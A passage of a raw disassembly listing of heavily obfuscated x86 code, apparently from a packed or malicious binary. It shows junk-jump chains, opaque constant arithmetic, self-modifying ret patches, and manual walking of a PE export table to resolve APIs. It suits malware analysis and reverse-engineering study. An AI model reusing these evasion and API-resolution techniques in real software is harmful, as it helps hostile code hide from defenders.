add edi, 0FBB7CB20h
and edi, 0D8E506F6h
sub edi, 493E44D1h
add edi, 0F6CAC864h
jmp loc_447AF3
; END OF FUNCTION CHUNK FOR sub_44871F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455060
loc_44A621: ; CODE XREF: sub_455060:loc_4435C3j
push 0A3435A98h
pop ecx
or ecx, 17B3AF37h
test ecx, 4
jmp loc_44BA54
; END OF FUNCTION CHUNK FOR sub_455060
; ---------------------------------------------------------------------------
jmp ds:off_41D1E8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45137D
loc_44A63E: ; CODE XREF: sub_45137D+4F50j
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_45137D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E700
loc_44A643: ; CODE XREF: sub_43E700+FB0Dj
jmp loc_446D28
; END OF FUNCTION CHUNK FOR sub_43E700
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A4D
loc_44A648: ; CODE XREF: sub_444A4D+53D4j
; sub_44FF0A:loc_4519CDj ...
jz loc_4595A2
xchg eax, [esp+0]
mov edx, eax
pop eax
mov eax, [esp-4+arg_0]
push esi
jmp loc_44993E
; END OF FUNCTION CHUNK FOR sub_444A4D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4417AF
loc_44A65D: ; CODE XREF: sub_4417AF:loc_44039Bj
mov eax, ebx
sbb ebx, eax
jmp loc_44E83B
; END OF FUNCTION CHUNK FOR sub_4417AF
; ---------------------------------------------------------------------------
jmp ds:off_41D0B8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2E0
loc_44A66C: ; CODE XREF: sub_44E2E0+1453j
jmp locret_4524BA
; END OF FUNCTION CHUNK FOR sub_44E2E0
; ---------------------------------------------------------------------------
loc_44A671: ; CODE XREF: ut7h7i2x:0044BDA9j
jmp locret_443C81
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_44A676: ; CODE XREF: sub_44F43B-115A0j
jmp loc_444C9F
; END OF FUNCTION CHUNK FOR sub_44F43B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E7EC
loc_44A67B: ; CODE XREF: ut7h7i2x:0043DF41j
; sub_43E7EC+1Ej ...
xchg esi, [esp-4+arg_0]
push offset sub_43FA90
jmp nullsub_562
; END OF FUNCTION CHUNK FOR sub_43E7EC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_44A688: ; CODE XREF: sub_4524FE:loc_45890Aj
xor edi, 0CC610BFBh
cmp edi, 0F8BF98BEh
jmp loc_43C1CD
; END OF FUNCTION CHUNK FOR sub_4524FE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_65. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4580CF
loc_44A69A: ; CODE XREF: sub_4580CF+1j
jmp loc_441E96
; END OF FUNCTION CHUNK FOR sub_4580CF
; ---------------------------------------------------------------------------
or edx, 94B0F503h
shl edi, 6
jmp sub_44DEFF
; ---------------------------------------------------------------------------
loc_44A6AD: ; CODE XREF: ut7h7i2x:0044857Cj
sbb edi, ecx
; =============== S U B R O U T I N E =======================================
sub_44A6AF proc near ; CODE XREF: ut7h7i2x:loc_454B76p
arg_0 = dword ptr 4
xchg edx, [esp+0]
pop edx
xchg edi, [esp-4+arg_0]
jmp sub_43D797
sub_44A6AF endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43EF73
loc_44A6BB: ; CODE XREF: sub_43EF73+17C1Bj
test eax, 5EE814A7h
jmp loc_4577C2
; END OF FUNCTION CHUNK FOR sub_43EF73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4482D0
loc_44A6C6: ; CODE XREF: sub_4482D0+9j
mov edx, eax
xchg ebp, [esp+0]
mov eax, ebp
pop ebp
mov eax, [esp-4+arg_0]
jmp loc_44AD43
; END OF FUNCTION CHUNK FOR sub_4482D0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455111
loc_44A6D6: ; CODE XREF: sub_455111:loc_448531j
add edx, 72857F2h
sub edx, 5230FB7Eh
js loc_450493
; END OF FUNCTION CHUNK FOR sub_455111
; START OF FUNCTION CHUNK FOR sub_444029
loc_44A6E8: ; CODE XREF: sub_444029+Aj
jmp loc_44CF06
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F256
loc_44A6ED: ; CODE XREF: sub_44F256-14D15j
jmp loc_447A99
; END OF FUNCTION CHUNK FOR sub_44F256
; ---------------------------------------------------------------------------
jge loc_43CAC1
cmp ebp, eax
jmp loc_44F9F7
; ---------------------------------------------------------------------------
loc_44A6FF: ; DATA XREF: sub_447185-9E67o
add edi, 0DB33F8CEh
xchg edi, [esp]
jmp sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B1E7
loc_44A70D: ; CODE XREF: sub_44B1E7:loc_44A717j
call sub_44451E
loc_44A712: ; CODE XREF: sub_43CB0D+1AD59j
jmp nullsub_526
; ---------------------------------------------------------------------------
loc_44A717: ; CODE XREF: sub_44B1E7-DB7Fj
jmp loc_44A70D
; END OF FUNCTION CHUNK FOR sub_44B1E7
; ---------------------------------------------------------------------------
loc_44A71C: ; CODE XREF: ut7h7i2x:00456773j
jnz loc_4516FD
and edx, 302B9944h
loc_44A728: ; CODE XREF: ut7h7i2x:0044CE4Aj
mov edx, [ebp+0]
jmp loc_4516FD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AED9
loc_44A730: ; CODE XREF: sub_43AED9:loc_448A8Dj
jz loc_446BA0
jmp loc_447F82
; END OF FUNCTION CHUNK FOR sub_43AED9
; ---------------------------------------------------------------------------
loc_44A73B: ; CODE XREF: ut7h7i2x:loc_43A5FBj
pop eax
and eax, 7C0462C1h
sub eax, 0C99273D2h
xor eax, 347DD9E5h
cmp eax, 27B8E13Ch
jmp loc_44BFB5
; ---------------------------------------------------------------------------
loc_44A759: ; CODE XREF: ut7h7i2x:00444DA5j
mov edx, [edx]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_45793C
jmp loc_43D7A1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_44A76A: ; CODE XREF: sub_43A556:loc_43F90Dj
push 26D24701h
pop eax
rol eax, 1Ah
test eax, 100000h
jmp loc_456CF0
; END OF FUNCTION CHUNK FOR sub_43A556
; =============== S U B R O U T I N E =======================================
sub_44A77E proc near ; CODE XREF: ut7h7i2x:0044A064j
; sub_442B3B+BB16p
xchg edx, [esp+0]
pop edx
pop edi
lea eax, sub_45A599
mov byte ptr [eax], 0C3h
jmp sub_45A599
sub_44A77E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A599
loc_44A791: ; CODE XREF: sub_45A599j
pop edx
push offset sub_456B2D
jmp nullsub_435
; END OF FUNCTION CHUNK FOR sub_45A599
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4464B7
loc_44A79C: ; CODE XREF: sub_4464B7:loc_44B88Bj
test eax, 4
jmp loc_43E57B
; END OF FUNCTION CHUNK FOR sub_4464B7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44CE09
loc_44A7A7: ; CODE XREF: sub_44CE09-DDF9j
call sub_4439B0
push 0E9519B85h
pop eax
rol eax, 1Ch
and eax, 8C7C5FB9h
or eax, 14D7DD95h
loc_44A7C1: ; CODE XREF: ut7h7i2x:loc_441014j
jmp loc_450386
; END OF FUNCTION CHUNK FOR sub_44CE09
; =============== S U B R O U T I N E =======================================
sub_44A7C6 proc near ; CODE XREF: ut7h7i2x:00445144p
arg_0 = dword ptr 4
xchg ecx, [esp+0]
pop ecx
xchg ecx, [esp-4+arg_0]
sub_44A7C6 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_458345
loc_44A7CD: ; CODE XREF: sub_458345-1A7C2j
jmp loc_446986
; END OF FUNCTION CHUNK FOR sub_458345
; =============== S U B R O U T I N E =======================================
sub_44A7D2 proc near ; CODE XREF: sub_450F2A-11E69p
; ut7h7i2x:00440BB8j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00439889 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043F883 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004425A5 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0045A9C0 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
jz loc_4425A5
mov eax, [esp+4+var_4]
push edx
push offset sub_43FF2B
jmp loc_45A9C0
sub_44A7D2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442E16
loc_44A7EA: ; CODE XREF: sub_442E16:loc_443B38j
pop edx
mov eax, [esp-4+arg_0]
push ecx
mov ecx, edx
xchg ecx, [esp+0]
jmp loc_4526A7
; END OF FUNCTION CHUNK FOR sub_442E16
; ---------------------------------------------------------------------------
shr edi, 18h
jmp sub_43C08A
; ---------------------------------------------------------------------------
cmp edi, edx
jmp loc_4572DA
; ---------------------------------------------------------------------------
loc_44A808: ; DATA XREF: ut7h7i2x:00449B37o
push edx
pushf
push 826D8D09h
pop edx
loc_44A810: ; CODE XREF: ut7h7i2x:0043A900j
sub edx, 0B63B0087h
test edx, 80000000h
jmp loc_458CF8
; ---------------------------------------------------------------------------
loc_44A821: ; DATA XREF: sub_43F3AE+Do
mov eax, [ebp+8]
push eax
call sub_442872
cmp dword ptr [ebp-8], 0
jmp loc_445D8F
; =============== S U B R O U T I N E =======================================
sub_44A833 proc near ; CODE XREF: sub_44F256:loc_43A52Cp
; ut7h7i2x:0043CED8p ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00453CDC SIZE 00000005 BYTES
push ecx
mov ecx, ebp
xchg ecx, [esp+4+var_4]
push offset loc_445A5D
jmp loc_453CDC
sub_44A833 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44825D
loc_44A843: ; CODE XREF: sub_44825D-AC5Ej
push esi
xchg ebx, eax
; END OF FUNCTION CHUNK FOR sub_44825D
; START OF FUNCTION CHUNK FOR sub_44615D
loc_44A846: ; CODE XREF: sub_44615D:loc_439E4Bj
; sub_44615D-822Aj ...
push offset loc_43CDA8
jmp nullsub_75
; END OF FUNCTION CHUNK FOR sub_44615D
; ---------------------------------------------------------------------------
loc_44A850: ; CODE XREF: ut7h7i2x:loc_443E53j
mov eax, 120h
call sub_4448AF
jmp loc_442218
; ---------------------------------------------------------------------------
mov dword ptr [ebp-8], 1
jmp loc_44AF45
; ---------------------------------------------------------------------------
db 0ADh
dword_44A86C dd 2E5E3BEAh ; DATA XREF: sub_4492A1:loc_4524A6r
; sub_4548DE+4w ...
dword_44A870 dd 6A43h ; DATA XREF: sub_4431FF+EE7Dr
; sub_4431FF+16777w
; ---------------------------------------------------------------------------
loc_44A874: ; CODE XREF: ut7h7i2x:0043B685j
jmp loc_442060
; ---------------------------------------------------------------------------
db 8Ah, 25h, 0A4h
dword_44A87C dd 51A77E77h ; DATA XREF: sub_4540AE+4w
; sub_444374+105FEr ...
dword_44A880 dd 0DF950DDFh ; DATA XREF: sub_44AAA2+Aw
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_44A884: ; CODE XREF: sub_43F7A5+C269j
jmp nullsub_8
; END OF FUNCTION CHUNK FOR sub_43F7A5
; ---------------------------------------------------------------------------
db 3Bh, 0AAh, 0D2h
dd 0CE71BBF3h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445048
loc_44A890: ; CODE XREF: sub_445048-9CC7j
jmp loc_459F99
; END OF FUNCTION CHUNK FOR sub_445048
; ---------------------------------------------------------------------------
db 9Ch, 0E9h, 51h
dword_44A898 dd 41DF9E72h ; DATA XREF: sub_459FAF:loc_43E5A9r
; ut7h7i2x:00447789w ...
dword_44A89C dd 0E53BEA5Eh ; DATA XREF: sub_43B6FC+8w
; sub_452CBB-10568r ...
; ---------------------------------------------------------------------------
loc_44A8A0: ; CODE XREF: ut7h7i2x:0044BC2Dj
jmp loc_44BF0F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4445DC
loc_44A8A5: ; CODE XREF: sub_4445DC-3BE3j
jmp loc_43C2EA
; END OF FUNCTION CHUNK FOR sub_4445DC
; ---------------------------------------------------------------------------
dw 7715h
dword_44A8AC dd 0EAE1663Bh ; DATA XREF: sub_449D60+7r
; ut7h7i2x:loc_44F6D7w
; ---------------------------------------------------------------------------
loc_44A8B0: ; CODE XREF: ut7h7i2x:00447A58j
jmp loc_456703
; ---------------------------------------------------------------------------
loc_44A8B5: ; DATA XREF: sub_4550FF-15441o
jnz loc_4552D7
mov ecx, [ebx+edx-4]
or ecx, ecx
jmp loc_455EB3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4550FF
loc_44A8C6: ; CODE XREF: sub_4550FF+4j
add edx, 14h
jmp loc_458F02
; END OF FUNCTION CHUNK FOR sub_4550FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456B6D
loc_44A8CE: ; CODE XREF: sub_456B6D:loc_44B494j
push eax
push 7D87F5D2h
pop eax
rol eax, 0Dh
jmp loc_44EEC2
; END OF FUNCTION CHUNK FOR sub_456B6D
; ---------------------------------------------------------------------------
cdq
jmp sub_4593D3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_457. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F66D
loc_44A8E4: ; CODE XREF: sub_43F66D-4CE2j
; ut7h7i2x:loc_457025j
add eax, 0E492EB2Ch
push offset loc_456122
jmp loc_445EB3
; END OF FUNCTION CHUNK FOR sub_43F66D
; ---------------------------------------------------------------------------
loc_44A8F4: ; CODE XREF: ut7h7i2x:004497E3j
jz loc_44898F
jmp loc_452C9B
; ---------------------------------------------------------------------------
cmp dword ptr [ebp-0Ch], 0
jz loc_4569A7
jmp loc_4457DB
; ---------------------------------------------------------------------------
loc_44A90E: ; DATA XREF: sub_4505C0+4o
pushf
push 94BF5B24h
pop esi
xor esi, 0F7436E4Fh
sub esi, 7B70D0F9h
or esi, 0DB2BA83Ch
jmp loc_441DC0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44261F
loc_44A92C: ; CODE XREF: sub_44261F:loc_4549C5j
xor esi, 28660541h
add esi, ebp
add esi, 92C14910h
mov [esi], eax
pop esi
pushf
push 0FB0872F0h
pop eax
jmp loc_4509BA
; END OF FUNCTION CHUNK FOR sub_44261F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_409. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BBF3
loc_44A94A: ; CODE XREF: sub_43BBF3+16j
jmp loc_43FF3D
; END OF FUNCTION CHUNK FOR sub_43BBF3
; ---------------------------------------------------------------------------
mov esi, [edx]
jmp sub_4411BF
; ---------------------------------------------------------------------------
loc_44A956: ; DATA XREF: ut7h7i2x:0045729Do
pop edi
lea eax, loc_454B3E
mov byte ptr [eax], 0C3h
jmp loc_450CBA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_44A965: ; CODE XREF: sub_449E96:loc_454B3Ej
pop edx
jmp loc_4541F0
; END OF FUNCTION CHUNK FOR sub_449E96
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_369. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458CBB
loc_44A96C: ; CODE XREF: sub_458CBB-8225j
jmp loc_451E4D
; END OF FUNCTION CHUNK FOR sub_458CBB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4524FE
loc_44A971: ; CODE XREF: sub_4524FE:loc_43FB7Bj
mov eax, [ebp-1Ch]
shl eax, 8
mov edx, [ebp-20h]
movzx edx, byte ptr [edx]
or eax, edx
loc_44A97F: ; CODE XREF: ut7h7i2x:0044C817j
jmp loc_44CC85
; END OF FUNCTION CHUNK FOR sub_4524FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449217
loc_44A984: ; CODE XREF: sub_449217:loc_4567BFj
mov ebx, [eax+18h]
mov ecx, [ebx+3Ch]
mov ecx, [ebx+ecx+78h]
call sub_4481A2
; END OF FUNCTION CHUNK FOR sub_449217
; START OF FUNCTION CHUNK FOR sub_44E2C4
loc_44A993: ; CODE XREF: sub_44E2C4-FFBj
jmp loc_450439
; END OF FUNCTION CHUNK FOR sub_44E2C4
; =============== S U B R O U T I N E =======================================
sub_44A998 proc near ; DATA XREF: sub_442E16-2D3Do
mov eax, [esp+0]
push edx
call sub_44B85E
jmp ds:off_41D184
sub_44A998 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454B2B
loc_44A9A7: ; CODE XREF: sub_454B2B+8j
jmp loc_43EB01
; END OF FUNCTION CHUNK FOR sub_454B2B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B122
loc_44A9AC: ; CODE XREF: sub_44B122+15j
jmp loc_452090
; END OF FUNCTION CHUNK FOR sub_44B122
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_44A9B1: ; CODE XREF: sub_43CCC3+A6AFj
jmp loc_43DA9F
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DEFF
loc_44A9B6: ; CODE XREF: sub_44E70F:loc_443308j
; sub_45AB7D-92E3j ...
pop edx
jz loc_4467F1
mov eax, [esp-8+arg_4]
push ecx
mov ecx, ebx
xchg ecx, [esp+0]
jmp loc_446D6C
; END OF FUNCTION CHUNK FOR sub_44DEFF
; =============== S U B R O U T I N E =======================================
sub_44A9CB proc near ; DATA XREF: sub_45A8C1-14C3Co
; FUNCTION CHUNK AT 00455E94 SIZE 00000009 BYTES
xor edx, 0D3653B3Fh
add edx, ebp
add edx, 1BA047F9h
mov [edx], eax
jmp loc_455E94
sub_44A9CB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445F20
loc_44A9E0: ; CODE XREF: sub_445F20+Aj
xchg edx, [esp+4+var_4]
mov eax, edx
pop edx
or eax, 0F9FD127h
rol eax, 1Eh
jmp loc_43A9FD
; END OF FUNCTION CHUNK FOR sub_445F20
; ---------------------------------------------------------------------------
call sub_45A83C
; START OF FUNCTION CHUNK FOR sub_458CA4
loc_44A9F9: ; CODE XREF: sub_458CA4+12j
jmp loc_442FB2
; END OF FUNCTION CHUNK FOR sub_458CA4
; ---------------------------------------------------------------------------
loc_44A9FE: ; CODE XREF: ut7h7i2x:0044B6FDj
jmp loc_43EEAD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_44AA03: ; CODE XREF: sub_442B3B+3172j
or eax, ecx
adc ebp, 15753152h
and ebx, 0D7726E56h
and edx, ebp
jmp loc_43DE56
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A92F
loc_44AA18: ; CODE XREF: sub_43A92F:loc_43C01Dj
sub al, 99h
mov edx, [ebp-4]
jmp loc_442BEA
; END OF FUNCTION CHUNK FOR sub_43A92F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45341C
loc_44AA22: ; CODE XREF: sub_45341C:loc_43D2B9j
; sub_45341C-DFFCj
mov eax, [ebp-4]
cmp byte ptr [eax], 0F1h
loc_44AA28: ; CODE XREF: ut7h7i2x:loc_448ABBj
jnz loc_43E3BC
jmp loc_448327
; END OF FUNCTION CHUNK FOR sub_45341C
; =============== S U B R O U T I N E =======================================
sub_44AA33 proc near ; CODE XREF: sub_452B14:loc_445359j
; sub_43E68B+D2FBj
; FUNCTION CHUNK AT 0043AF06 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00442A16 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044D98E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F8F0 SIZE 00000016 BYTES
push ebx
call sub_454AFE
loc_44AA39: ; CODE XREF: sub_4476D0+1C37j
jmp loc_442A16
sub_44AA33 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_44AA3E: ; CODE XREF: ut7h7i2x:0044617Ej
jmp locret_454BD0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B789
loc_44AA43: ; CODE XREF: sub_44B789:loc_44DDFDj
mov eax, ds:dword_443750
call sub_44B68F
loc_44AA4E: ; CODE XREF: ut7h7i2x:0043D0EBj
jno loc_4422A9
; END OF FUNCTION CHUNK FOR sub_44B789
; =============== S U B R O U T I N E =======================================
sub_44AA54 proc near ; CODE XREF: sub_445E9E-8E02p
; FUNCTION CHUNK AT 00439873 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441883 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441EB9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442B13 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00444914 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00446552 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004495A3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449E36 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B015 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E4CB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454A01 SIZE 0000001F BYTES
xchg edi, [esp+0]
pop edi
cmp al, 0A4h
jmp loc_44B015
sub_44AA54 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A3BB
loc_44AA5F: ; CODE XREF: sub_44A3BB+375Ej
push 72B4A20h
pop eax
xor eax, 371EAD44h
sub eax, 7A2445F5h
jmp loc_453F85
; END OF FUNCTION CHUNK FOR sub_44A3BB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444029
loc_44AA76: ; CODE XREF: sub_444029-5AF5j
not edx
pushf
loc_44AA79: ; CODE XREF: sub_444029:loc_44B7C5j
mov eax, [ebp-24h]
mov ecx, [eax+4]
push 7FDB74C6h
pop eax
add eax, 14442207h
loc_44AA8B: ; CODE XREF: ut7h7i2x:loc_448384j
jmp loc_440512
; END OF FUNCTION CHUNK FOR sub_444029
; ---------------------------------------------------------------------------
xchg ebp, [esp]
mov edx, ebp
pop ebp
pop eax
mov ds:dword_4502B8, edx
loc_44AA9D: ; CODE XREF: ut7h7i2x:00447212j
; ut7h7i2x:0044A525j
call sub_4502AD
; =============== S U B R O U T I N E =======================================
sub_44AAA2 proc near ; CODE XREF: ut7h7i2x:loc_441DE4j
; ut7h7i2x:0044EEBDp ...
arg_0 = dword ptr 4
xchg eax, [esp+0]
pop eax
xchg esi, [esp-4+arg_0]
ror eax, 16h
mov ds:dword_44A880, eax
retn
sub_44AAA2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458362
loc_44AAB3: ; CODE XREF: sub_458362+9j
jmp loc_45A5F0
; END OF FUNCTION CHUNK FOR sub_458362
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449EE1
loc_44AAB8: ; CODE XREF: sub_449EE1+5AA3j
jmp loc_45598E
; END OF FUNCTION CHUNK FOR sub_449EE1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CCC3
loc_44AABD: ; CODE XREF: sub_43CCC3+11F3Fj
jmp loc_458C30
; END OF FUNCTION CHUNK FOR sub_43CCC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B847
loc_44AAC2: ; CODE XREF: sub_43B847+7FF6j
jmp loc_4506E0
; END OF FUNCTION CHUNK FOR sub_43B847
; =============== S U B R O U T I N E =======================================
sub_44AAC7 proc near ; CODE XREF: ut7h7i2x:0044233Ej
; ut7h7i2x:00455E3Bp
arg_0 = dword ptr 4
xchg edi, [esp+0]
pop edi
add edi, 58483033h
xchg edi, [esp-4+arg_0]
jmp sub_44D8E8
sub_44AAC7 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_44AAD9: ; CODE XREF: sub_439BF8+1626Fj
jz loc_445C8F
jmp loc_43D211
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B72F
loc_44AAE4: ; CODE XREF: sub_44B72F:loc_441B78j
mov edx, esi
pop esi
or edx, 0B7A0C358h
xor edx, 3C2A629Dh
loc_44AAF3: ; CODE XREF: ut7h7i2x:loc_456AB6j
rol edx, 0Eh
jmp loc_454A71
; END OF FUNCTION CHUNK FOR sub_44B72F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44937E
loc_44AAFB: ; CODE XREF: sub_44937E-FDE6j
push 0C2E02A6Dh
pop eax
or eax, 752DC717h
add eax, 9DF07534h
rol eax, 13h
add eax, 0DAA7D909h
jmp loc_44397C
; END OF FUNCTION CHUNK FOR sub_44937E
; ---------------------------------------------------------------------------
loc_44AB1B: ; CODE XREF: ut7h7i2x:00448D70j
mov ebp, esi
loc_44AB1D: ; CODE XREF: ut7h7i2x:loc_448D5Ej
add edx, 613B5454h
mov [edx], eax
push offset sub_459812
jmp loc_45603A
; ---------------------------------------------------------------------------
loc_44AB2F: ; DATA XREF: sub_452B14-1000Bo
pop edi
rol eax, 8
push esi
push 64A6228h
pop esi
rol esi, 17h
xor esi, 0A3811AA9h
jmp loc_43FDF4
; ---------------------------------------------------------------------------
jnb loc_4536C4
jmp sub_43D509
; ---------------------------------------------------------------------------
loc_44AB53: ; DATA XREF: sub_43A556+6C30o
mov dword ptr [eax], 737361h
call sub_453790
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_44AB5E: ; CODE XREF: sub_43AB62+2013Fj
jmp sub_4593AA
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445D25
loc_44AB63: ; CODE XREF: sub_445D25+Cj
jmp loc_4530F9
; END OF FUNCTION CHUNK FOR sub_445D25
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445056
loc_44AB68: ; CODE XREF: sub_445056-8EBEj
cmp eax, ecx
jmp loc_439568
; END OF FUNCTION CHUNK FOR sub_445056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_44AB6F: ; CODE XREF: ut7h7i2x:004484EDj
; ut7h7i2x:loc_44AF45j ...
mov eax, [ebp-8]
mov esp, ebp
xchg edx, [esp+0]
and ebp, 9331366Fh
jmp loc_455D8B
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
loc_44AB82: ; CODE XREF: ut7h7i2x:004522D8j
mov ebx, 0F0C72291h
jmp loc_4443A4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44EB88
loc_44AB8C: ; CODE XREF: sub_44EB88:loc_4414B4j
xor ebx, 961E9070h
add ebx, 9BF787C0h
xor ebx, 0A3367090h
or ebx, 0ED2BCEE7h
add ebx, 597475h
xchg ebx, [esp+0]
jmp loc_4477EE
; END OF FUNCTION CHUNK FOR sub_44EB88
; ---------------------------------------------------------------------------
js loc_4526F9
jmp sub_44F000
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444DE9
loc_44ABBD: ; CODE XREF: sub_444DE9+1j
mov ebp, esp
jnz sub_4399B5
add esp, 0FFFFFFD0h
mov eax, 12h
jmp sub_4586D6
; END OF FUNCTION CHUNK FOR sub_444DE9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456B19
loc_44ABD2: ; CODE XREF: sub_456B19-9843j
jnz loc_4523E9
jmp loc_44E658
; END OF FUNCTION CHUNK FOR sub_456B19
; ---------------------------------------------------------------------------
byte_44ABDD db 81h, 0F0h, 61h ; DATA XREF: sub_44DF79:loc_44741Ao
dd 81C8DDAAh, 41AB24C0h, 9E880FF3h, 81FFFEFFh, 2F5F2DF0h
dd 1555E978h
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44BF76
loc_44ABFA: ; CODE XREF: sub_44BF76:loc_439AAFj
jnz loc_443F01
; END OF FUNCTION CHUNK FOR sub_44BF76
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_44AC00: ; CODE XREF: sub_439BF8:loc_4512C7j
jmp loc_44F297
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
sub eax, 0F3EBB8E8h
xor eax, 0E36B5683h
push ecx
push 4D59BFE9h
pop ecx
rol ecx, 4
or ecx, 7A4BD66Ah
jmp loc_439CC1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_564. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4529ED
loc_44AC27: ; CODE XREF: sub_4529ED+13j
jmp nullsub_14
; END OF FUNCTION CHUNK FOR sub_4529ED
